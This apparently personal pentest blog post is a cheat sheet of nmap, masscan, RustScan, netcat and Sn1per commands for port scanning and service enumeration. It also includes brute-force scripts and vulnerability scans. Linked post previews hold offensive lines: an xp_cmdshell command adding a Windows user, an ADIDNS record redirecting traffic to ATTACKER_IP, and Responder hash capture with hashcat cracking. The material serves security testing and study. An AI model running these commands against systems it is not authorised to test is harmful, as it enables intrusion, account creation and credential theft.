Skip to main content

Nmap & Service Enumeration - Commands and Process

By 

RustScan for High Speed Open Ports Detection

https://github.com/RustScan/RustScan/releases 
download the debian package 
dpkg -i filename
rustscan 10.10.10.10
rustscan 10.10.10.0/24 -p 80,443 --no-nmap

or you can use masscan
masscan --rate 15000 -oB myscan.mass 10.0.0.0/8 --ports 0-65535
Reconnoitre for service enum

git clone https://github.com/codingo/Reconnoitre.git
cd reconnoitre
python setup.py install

reconnoitre -t 10.10.10.10 --services -o new_recon

Vanquish - Information Gathering

git clone https://github.com/frizb/Vanquish.git
cd Vanquish
python2.7 Vanquish2.py -install

echo 192.168.126.133 >> test.txt
vanquish -hostFile test.txt -logging

#read the output, located in hosts directory
sn1per - Automated Enum

git clone https://github.com/1N3/Sn1per
cd Sn1per
bash install.sh

1N3/Sn1per: Attack Surface Management Platform | Sn1perSecurity LLC (github.com) 

#NORMAL MODE + OSINT + RECON
sniper -t <TARGET> -o -re

sniper -t 10.10.10.10 -m vulnscan
sniper -t 10.10.10.10 -m webscan
Nmap Commands for Internal scans

sudo nmap -sV -sC 10.10.10.10 -p 22 -oN nmap

#Scan for all the ports very fast - 10,000 packets per second
nmap -p- -v -oA nmap/allports 10.10.10.10

#Common Ports Scan
nmap -p80,23,443,21,22,25,3389,110,445,139,143,53,135,3306,8080,1723,111,995,993,5900,8443,8000,1433,1434, 1521,1630,5432,3306 -Pn -oA scan 10.30.214.0/24 --randomize-hosts --open

#Nmap Script scan using Categories 
nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 10.10.10.10

#Segmentation Test using nmap 
sudo nmap -Pn -p- --min-hostgroup 100 --min-parallelism 100 -T4 -n -sS 10.10.10.0/24 -oG scan_result.grep 



Port Scanning using Netcat/nc

netcat -v -z -n -w 1 10.10.10.10 1-1023

for port in $(cat ports.txt); do netcat -v -z -n -w 1 10.10.10.10 $port; done 

-z : Port scanning mode i.e. zero I/O mode.
-v : Be verbose [use twice -vv to be more verbose].
-n : Use numeric-only IP addresses i.e. do not use DNS to resolve ip addresses.
-w 1 : Set time out value to 1.
-u : Use udp instead of TCP.
-4 : Force IPv4 version addresses.
-6 : Make sure we use IPv6 version addresses only.

Nmap - How it Works

open --> is accepting connections

closed--> nmap is able to make a request to the port, but no app is using it

filtered--> cant determine its state, something is blocking access to the port

unfiltered--> port is accessible(able to make a request to the port), but nmap cant decide if its open or closed 
*only shows up when doing an ACK scan, used to map firewall rule sets.

open|Filtered --> nmap cant decide weather the port is open or filtered. port is open, but no response is received. Appears in UDP, IP protocol, FIN, Null and Xmas scans only

Closed|Filtered --> Namp is unable to determine weather closed or filtered, Appears only in idle scans 

Note: 

// Nmap needs to be run as a root --> its performs SYN scan: which is better; get mac address as well
// without root --> it performs connect scan

Nmap has various options for scan speed (use -T)
0 Paranoid: Waits 5 minutes between packets (serial)
1 Sneaky: 15 seconds between packets (serial)
2 Polite: 0.4 seconds between packets (serial)
3 Normal (default): Designed to not overwhelm network or miss targets/ports (parallel)
4 Aggressive: Safe to use on most modern networks (parallel)
5 Insane: Spends up to 15 minutes per host (gives up on that host and moves on if scan  taking longer for it), "assumes that you are on  on extraordinarily fast network or are willing to sacrifice some accuracy for speed" (parallel)

Top 20 most common ports (according to Nmap's services list): 80, 23, 443, 21, 22, 25, 3389, 110, 445, 139, 143, 53, 135, 3306, 8080, 1723, 111, 995, 993, 5900
NMAP Detection for TCP

1. Send SYN & Response is SYN-ACK == Port Open
2. Send SYN & Response is RST-ACK == Port is closed || Firewall Blocked it
3. Send SYN & Response is ICMP Port Unreachable == Filtered
4. Send SYN & No Response == Blocked by firewall, Filtered

NMAP Detection for UDP

1. Send UDP Packet & Respose is a UDP Packet == Port Open
2. Send UDP Packet & Response is ICMP Port Unreachable == Port is closed or Firewall blocked it
3. Send UDP Packet & If there is no response == Port is closed or filtered

UDP detection is kind of hard. So, usually nmap sends protocol/port based requests for UDP to better detection.

Use --defeat-icmp-ratelimit for better UDP Scan
NMAP Scanning Types

1. Connect Scan  = -sT
 - Completes 3 Way Handshake & closes with a RESET
 - Can run without ROOT
 - Use it for Fragile networks

2. SYN/Stealth Scan  = -sS 
 - SYN-ACK response == Open
 - SYN-RST response == Closed
 - SYN- No response == filtered
requires root privileges to run 

3. ACK Scan  = -sA
 - Used for Host Discovery

4. FIN Scan  = -sF
  - sends packets with the FIN Control Bit set

5. Null Scan = -sN 
  - set none of the Control Bits

6. XMAS Scan  = -sX 
 - set the FIN, PSH, and URG Control Bits

7. Maimon Scan  = -sM
 - sets the FIN and ACK bits
 - BSD-derived TCP stacks will respond to such a probe with a RESET if the port is closed and nothing if the port is open.

8. Add your own Falgs via --scanflags [URG|ACK| PSH|RST|SYN|FIN|ECE|CWR|ALL|NONE]

9. Multiple Scans  = -A
 - OS fingerprinting,version scan, script scan with default scripts, and traceroute (that is,-A = -O + -sV + -sC + --traceroute)
Useful Nmap Probing Options

-Pn : Don't probe and assume hosts are up, aliases of -Po (zero) or -PN 
-PB : Same as default, use ICMP Echo Request, SYN to TCP 443, ACK to TCP  80, and ICMP Timestamp Request (if UID o)
-PE : (formerly -PI): Send ICMP Echo Request (ICMP type 8)
-PSports :  Use TCP SYN to specified ports in the port list, do not use a space between ports or after the -PS (for example, -PS22,8o)
-PP : Send ICMP Timestamp Request (ICMP type 13) to find targets
-PM : Send ICMP Address Mask Request (ICMP type 17) to find targets
-PR : Use ARP to identify hosts (must be on Windows or UID o on Linux), this option only works with hosts on the same subnet and is used by default when targets are on the same subnet
Nmap Phases

Target Enumeration (read the target info, ip address(v4 or v6?), domain or ip? )
host discovery
reverse dns resolution (check the domain, prt address? )
port scanning
version detection
os detection
traceroute
script scanning
output
Nmap Commands

normal scan: nmap -p 80,443 192.168.1.0/24
target list scan: nmap -iL targets.txt
service version scan: nmap -p 80 -sV www.target.com
script: nmap -p 80 --script=http-title www.target.com
scan all ports: nmap -p1-65535 www.target.com
save output: nmap -oN output.txt www.target.com
save output nmap format: nmap -sP -oG filename 192.168.0.1/24
#Host Discovery ICMP Sweeps and TCP SYN packet probes to common ports

nmap -oA scan.dis --stats-every 60s --log-errors --traceroute --reason --randomize-hosts -v -R -PE -PP -PM -PO -PU -PY80,23,443,21,22,25,3389,110,445,139 -PS80,23,443,21,22,25,3389,110,445,139,143,53,135,3306,8080,1723,111,995,5900,1025,587,8888,199,1720,465,548,113,81,6001,10000,514,5060,179,1026,2000,8443,8000,32768,554,26,1433,49152,2001,515,8008,49154,1027,5666,646 -PA80,23,443,21,22,25,3389,110,445,139,143,53,135,3306,8080,1723,111,995,5900,1025,587,8888,199,1720,465,548,113,81,6001,10000,514,5060,179,1026,2000,8443,8000,32768,554,26,1433,49152,2001,515,8008,49154,1027,5666,646 -sS -sV -p21,22,23,25,80,443,8080,8443 10.10.10.10/23

#Common TCP Ports scan
nmap -oA top-10000 -stats-every 60s --log-errors --reason --randomize-hosts -v -R -Pn -A -sSVC -p- -iL live-host.txt

#Common UDP Ports scan
nmap -oA nmap-udp-output --stats-every 60s --log-errors --reason --randomize-hosts -v -R -Pn -A -sSVC -sU -p- -iL live-hosts.txt

#vuln scanning
nmap -oA web-services -sV -c -p 80,8080,443,8443,8081,8888,9443 -d --script=http-enum --stats-every 60s -iL live-hosts.txt 

#Using Scripts
nmap -n -sV --script "smb* and not brute" 10.10.10.10

#Full Scan
nmap -p- --max-retries 1 --max-rate 500 --max-scan-delay 20 -T4 -v --open -oN fullscan --system-dns --stats-every 3s 10.10.10.10


#Nmap SYn Scan on all TCP ports 
nmap -sS -sV -sC -v -p- -oA all-TCP 10.10.10.10


#nmap reverse DNS resolution
nmap -Pn -sn -R -oA dns-10.1.0.0_16 10.1.0.0/16

# nmap brute force scripts
nmap -vvv --script http-brute --script-args userdb=users.txt,passdb=pass.txt -p <port> <host>
nmap --script vmauthd-brute -p <port> <host>
nmap --script ftp-brute -p <port> <host>

# scan using set of scripts
nmap -sV --script=smb* -p <port> <host>
 
#CVE Scan
map -sV --script vulners --script-args mincvss=7.0 -p443,9000 --open -oN cve.nmap --system-dns --stats-every 3s 10.10.10.10

#Vulnerabilities Scan
nmap -sV --script vuln -p443,9000,443,9000 --open -oN vulns.nmap --system-dns --stats-every 3s 172.29.52.26

#Scan for SQL Servers
nmap -p 1433,1434,3306,3882 10.10.1.0/16 -Pn --open -sC -sV --script vulners

#Scan for DC's
nmap -p 88 10.30.197.0/24 -Pn --open -sC -sV --script vulners


take output ip's from the file and run a scan on them

cat filename | awk {'print $2'}      //$2 = 2nd column
cat filename | awk {'print $2'} >> Targets.txt


save output to xml: nmap -oX xml-dump.txt 192.168.0.1 , 192.168.0.2 , 192.168.0.23

full scan output: nmap -oA full-data www.target.com
Scanning IPV6 Targets

#get ipv6 address
host www.target.com

#Scan
nmap -6 www.target.com
OS scan: 

nmap -O www.target.com
nmap -O --osscan-guest  192.168.1.1 // saves time --max-os-tries=1
ping sweep, host discovery scan

nmap -sP www.target.com

version scan: 
nmap -sV --allports www.target.com
nmap -sV --version-intensity 9 www.target.com //0-9 range; 

default intensity is 7; 9 is max
nmap -sV --version-all www.target.com //goes to intensity 9 automatically

nmap -sV --version-light www.target.com // fragile device

Python Ping Sweep

import subprocess
nrange = "172.10.0.1"

for i in range(1, 254):
    address = nrange + str(i)
    res = subprocess.call(['fping','-a', '-q', address])

Scanning for Specific Flags

syn scan: nmap -sS www.target.com
tcp connect scan: nmap -sT www.target.com
udp scan: nmap -sU www.target.com // very slow scan
sctp INIT scan: -sY     // combination of UDP and TCP
TCP NULL scan: -sN     // doenst set any tcp flags in the packet
FIN scan: -sF        // sends FIN flag
Xmas scan: -sX        //sends all of the flags.. widening the flag
TCP ACK scan: -sA    // used to audit firewalls
Nmap Performace tuning:

-T paranoid|sneaky|polite|normal|aggressive|insane
    0     1      2      3        4        5
t3 is default

nmap -T4 www.target.com --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retires 6


#scans min 5 hosts, max 10
nmap --min-hostgroup 5 --max-hostgroup 10 192.168.1.0/24   

nmap --min-hostgroup 10 --min-parallelism 10 --max-parallelism 20 192.168.1.0/24

#less accurate results, higher performance
nmap --max-retries 1 www.target.com 

nmap --host-timeout 10m www.target.com
Nmap script Scan

cd /usr/share/nmap/
ls
cd scripts/
ls | wc -l    //516 scripts or so ...

nmap -sV --script http-wordpress-burte

nmap -sC www.target.com     //default family of nsc scripts

nmap --script discovery www.target.com  // discovery is a category

nmap --script=http-title,http-wordpress-brute  www.target.com

Automating Scan for Multiple IP's for AutoRecon.sh

git clone https://github.com/Bhanunamikaze/AutoRecon.git
cd AutoRecon
chmod +x ./requirements.sh
sudo ./requirements.sh 

cp AutoRecon.sh /usr/local/bin/AutoRecon.sh

#save the file as startscan.sh 
for ip in $(cat $1); do AutoRecon.sh $ip All & done
chmod +x startscan.sh

./startscan.sh ips.txt
Masscan/NMAP Useful Grep Commands

masscan -pO-65535 --rate 15000 -oB myscan.mass 10.0.0.0/8

#Convert the normal output to greppable format
masscan --open --readscan myscan.mass -oG myscan.grep

#Extract all live hosts
grep /open/ myscan.grep | cut -d ' -f 2 | sort -uV > myscan-hosts.txt

#Get all ports
grep /open/ myscan.grep | cut -d ' ' —f 4 | cut -d / -f 1 | sort -nk 1 | uniq > myscan-ports.txt

#Get all systems with port 80 open
grep ' 80/open/' myscan.grep | cut -d' ' -f 2 | sort -uV > myscan-80.txt

#Get live all open host:port
grep /open/ myscan.grep | cut -d/ -f 1 | cut -d ' ' -f 2,4 | sed -e 's//:/g' | sort -uV > myscan-host-port.txt

#Get Ports, Services from Nmap XML Output
 cat /tmp/ports | cut -d , -f2,3 | sort | uniq | tr -d \" | grep -v -E 'port|tcpwrapped' | sort -n

#Grep for SSL/HTTP Ports
 cat ports.nmap | grep 'ssl/http' | cut -d ' ' -f1 | cut -d / -f 1

#Replace new line with comma
sed ':a;N;$!ba;s/\n/, /g'

#Return alive hosts on a subnet
nmap -v -sP 192.168.0.0/16| grep -v “host down”| grep -o -E ‘[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}’

#Return alive hosts on a subnet
for i in {0..254}; do ping -c 1 172.18.0.$i | tr \\n ' '| awk '/1 packets received/ {print $2}' ; done

Grep IP Address and Ports from Nmap Scan Ouput

egrep -v "^#|Status: Up" 113-vlan | cut -d' ' -f2,4- | sed -n -e 's/Ignored.*//p' | grep open | sed 's/\/\/\/\///g' |sed 's/\/\/\///g' | sed 's/open\///g' | sed 's#//#/#g'

Output: 
127.0.0.1 80/tcp/http,443/tcp/https
127.0.0.2 8080/tcp/http-proxy, 9191/tcp
 




Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more